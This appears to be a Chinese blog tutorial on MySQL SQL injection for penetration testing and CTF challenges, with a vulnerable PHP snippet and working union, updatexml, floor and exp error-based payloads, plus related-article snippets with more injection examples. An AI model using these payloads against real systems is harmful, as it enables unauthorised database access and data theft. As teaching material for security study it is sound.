渗透测试和CTF中SQL注入攻击

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量594 收藏 1
点赞数 1
分类专栏: 渗透测试 网络安全 CTF 文章标签: 渗透测试 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43456810/article/details/110952938
版权
渗透测试 同时被 3 个专栏收录
32 篇文章 1 订阅
订阅专栏
网络安全
27 篇文章 0 订阅
订阅专栏
CTF
19 篇文章 0 订阅
订阅专栏

渗透测试和CTF中SQL注入攻击

本文内容主要基于MySQL的注入

首先,SQL注入的成因:开发人员在开发过程中,直接将URL中的参数,HTTP Body中的POST参数或其它外来的用户输入(如Cookies、User-Agent等)与SQL语句进行拼接,造成待执行的SQL语句可控,从而使我们可以执行任意SQL语句

常见SQL注入的分类

(1)可回显的注入
联合查询注入
报错注入
通过注入进行DNS请求,从而达到可回显的目的

(2)不可回显的注入
bool盲注
时间盲注

(3)二次注入
一般需要自己编写脚本已实现自动化注入

可以联合查询的SQL注入

在可以联合查询的题目中,一般会将数据库查询的数据回显到页面中
源代码类似如下:

<?php
	...
	$id = $_GET['id'];
	$getid = "SELECT ID FROM users WHERE user_id='$id'";
	...

此时,$id变量会将id获取到的参数直接拼接到SQL语句中
Payload如下:

?id=-1'+union+select+1+--+

闭合掉前面的单引号,注释掉后面的单引号

报错注入

主要有三种MySQL数据库报错注入的方法,分别是updatexml,floor和exp

  1. updatexml
    updatexml的报错原理从本质上来说就是函数的报错
    以前面的源代码为例:
<?php
	...
	$id = $_GET['id'];
	$getid = "SELECT ID FROM users WHERE user_id='$id'";
	...

Payload可以如下:

?id=1'+updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)%23
  1. floor
    floor报错的原理是rand和order by或group by的冲突
    还是以上面的源代码为例,
    爆破数据库版本信息的Payload如下:
?id=1'+and(select 1 from (select count(*),concat((select (select (select concat(0x7e, version(),0x7e))) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x)a)%23

爆破当前用户的Payload:
将上面的payload中的version()改为user()

爆破当前使用的数据库Payload:
将上面的payload中的version()改为database()

  1. exp
    exp报错的本质原因是溢出报错
    以一开始的源代码为例:
    Payload为:
?id=1' and exp(~(select * from (select user())x))%23
sherlockjjobs
关注
专栏目录
《WEB安全渗透测试》(9)SQL注入实战:base64注入
午夜安全
10-24 4188
《WEB安全渗透测试》(9)SQL注入实战:base64注入 base64注入是针对传递的参数被base64加密后的注入点进行注入。这种方式常用来绕过一些WAF的检测。1)判断是否存在注入使用Burp的Decoder模块对参数进行base64编码,如下所示:id=1,id=1’,id=1 and 1=1,id=1 and 1=2编码后:id=MQ==,id=MSc=,id=MSBhbmQgMT0x,id=MSBhbmQgMT0y访问的结果如下,说明存在SQL注入漏洞。2)查询字段数量判断出字段数量是:...
《WEB安全渗透测试》(10)SQL注入实战:XFF注入
热门推荐
午夜安全
10-24 1万+
《WEB安全渗透测试》(10)SQL注入实战:XFF注入 X-Forwarded-For简称XFF头,它代表了客户端的真实IP,通过修改他的值就可以伪造客户端IP。1)判断是否存在注入使用Burp的Repeater模块对请求进行修改,分别修改X-Forwarded-For的值如下所示:X-Forwarded-for: 127.0.0.1X-Forwarded-for: 127.0.0.1’X-Forwarded-for: 127.0.0.1' and 1=1#......
CTF渗透测试【浅谈渗透测试之信息收集】
qq_43679507的博客
11-15 1006
CTF渗透测试【浅谈渗透测试之信息收集】
CTF从零到一 SQL注入攻击
山兔的博客
09-12 465
1.SQL注入攻击是开发者在开发程序时,对客户输入的参数过滤不严格,导致用户能更改数据库。 一.数字型注入: 1.访问链接http://192.168.20.133/sqll.php?id=2的页面和http://192.168.20.133/sqll.php?id=3-1的页面一样,可以说明这个注入点是数字型注入。表现为源码输入点“$_GET['id']”附近没有引号包裹。 2.链接模板:http://192.168.20.133/sqll.php?id=1 union select user,pwd f
ctfsql注入——基于约束的SQL攻击
wlllllianqing的博客
09-13 346
基于约束的SQL攻击 主要存在于在INSERT,SQL会根据varchar(n)来限制字符串的最大长度。如果字符串的长度大于“n”个字符的话,那么仅使用字符串的前“n”个字符。 注册: 1.username:admin; password:123456 2.username:admin                       1; password:123456 这里我们可以想到,如果只是使用前面五个字符,字符串末尾字符将会被删除,那么我们是不是可以通过该方法来注册并登录管理元账号? 进行测试:
CTF Web SQL注入专项整理(持续更新)_ctf sql注入(1)
m0_61072747的博客
04-07 1111
参考:https://blog.csdn.net/qq_44657899/article/details/10323914。
渗透测试——SQL注入
zjdda的博客
05-19 763
sql注入原理及实战
渗透测试——sql注入
yukinorong的博客
07-23 594
判断注入点 单引号判断 http://xxx/abc.php?id=1' 如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。 (如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入) 判断sql注入类型 数字型 ?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。 字符型 ?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。 sq
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 892
SQL注入getshell靶机实战
CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 653
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
CTF-10.sql注入(get)
woo233的博客
09-19 530
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
一道CTF题:sql爆破
qq_42646885的博客
08-22 600
题目: http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=-1' 打开网页: 说明存在sql注入。 尝试了一些常见的绕过操作都不行,过滤了注释--,空格,and,select等。尝试用/*11*/绕过 http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=...
N1CTF+BCTF(3道sql注入)
m0_38094687的博客
04-28 466
前言 三道sql注入题,涨姿势. 正文 77777 题目及分析 部分代码审计,实际上就是要对hi进行bool盲注,如果分数更新了,就说明注入为真. 解题脚本 #hi = where ord(mid((select group_concat(user())), 1, 1)) &gt; 0 &amp;flag=55553 import requests url =...
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1064
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库的相关信息。可知是字符型的布尔注入(盲注)
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 2007
内网代理技术拿下某CTF三层靶机渗透
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6258
关于SQL注入的思维导图可以点开看一下大图
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 734
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
2024年最新CTF Web SQL注入专项整理(持续更新)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1609
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值